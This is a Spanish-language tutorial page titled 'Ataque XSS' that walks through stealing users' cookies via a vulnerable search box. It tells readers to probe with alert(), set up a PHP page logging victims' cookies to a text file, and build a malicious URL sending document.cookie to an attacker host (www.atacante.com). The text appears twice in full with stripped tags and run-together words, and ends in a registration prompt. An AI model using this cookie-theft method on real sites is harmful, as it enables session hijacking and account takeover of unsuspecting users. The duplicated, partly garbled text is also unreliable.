Ataque Xss
Páginas: 2 (294 palabras)
Publicado: 20 de agosto de 2013
Ataque XSS
Comencemos con una pequeña introducción sobre está técnica. Pongamos un ejemplo de una web que utilice cookies y tenga un buscador interno.
Cookies
Unacookie es un almacén de información que se guarda en el ordenador del usuario y en cualquier momento la pagina puede pedir la información, que contiene la cookie, al
ordenador delusuario...
Ahora que sabemos que es una cookie lo que vamos a hacer es ver el nombre de la página donde se encuentra el buscador, en nuestro caso es buscador.php
Después vamosa ver si el buscador es vulnerable. Para ello podemos poner en el buscador, por ejemplo:
alert()
Si salta una alarma al pulsar el botón, significa que ese buscador esvulnerable.
Suponiendo que sea vulnerable, el siguiente paso es ver el nombre del formulario y del botón.
Para esto, tenemos que ver el código fuente de dicha página y buscaralgo como:
Este sería el Formulario
Este sería el Botón
Ahora ya sabemos que el formulario se llama palabra y que el botón se llama buscar.
Para almacenar las cookies,tenemos dos opciones
1º Almacenarlas en una base de datos (MySql).
2º Almacenarlas en un archivo de texto (Recomendable).
A continuación vamos a crear una pagina en php,este archivo creará otro (archivo.txt)
cuando algún usuario caiga en el ataque y escribirá a continuación los siguientes
usuarios:
ARCHIVO.TXT
Este archivo se crearáautomáticamente y será en el que se almacenen las cookies, osea, que para ver los resultados tienes que entrar en este archivo.
Una vez hecho este paso solo tenemos que crear "LAURL" que será de la siguiente forma:
http://www.vulnerable.com/buscador.php?palabra=window.location=
'http://www.atacante.com/cookies.php?cookie='+document.cookie;&b uscar=;
Comencemos con una pequeña introducción sobre está técnica. Pongamos un ejemplo de una web que utilice cookies y tenga un buscador interno.
Cookies
Unacookie es un almacén de información que se guarda en el ordenador del usuario y en cualquier momento la pagina puede pedir la información, que contiene la cookie, al
ordenador delusuario...
Ahora que sabemos que es una cookie lo que vamos a hacer es ver el nombre de la página donde se encuentra el buscador, en nuestro caso es buscador.php
Después vamosa ver si el buscador es vulnerable. Para ello podemos poner en el buscador, por ejemplo:
alert()
Si salta una alarma al pulsar el botón, significa que ese buscador esvulnerable.
Suponiendo que sea vulnerable, el siguiente paso es ver el nombre del formulario y del botón.
Para esto, tenemos que ver el código fuente de dicha página y buscaralgo como:
Este sería el Formulario
Este sería el Botón
Ahora ya sabemos que el formulario se llama palabra y que el botón se llama buscar.
Para almacenar las cookies,tenemos dos opciones
1º Almacenarlas en una base de datos (MySql).
2º Almacenarlas en un archivo de texto (Recomendable).
A continuación vamos a crear una pagina en php,este archivo creará otro (archivo.txt)
cuando algún usuario caiga en el ataque y escribirá a continuación los siguientes
usuarios:
ARCHIVO.TXT
Este archivo se crearáautomáticamente y será en el que se almacenen las cookies, osea, que para ver los resultados tienes que entrar en este archivo.
Una vez hecho este paso solo tenemos que crear "LAURL" que será de la siguiente forma:
http://www.vulnerable.com/buscador.php?palabra=window.location=
'http://www.atacante.com/cookies.php?cookie='+document.cookie;&b uscar=;
Leer documento completo
Regístrate para leer el documento completo.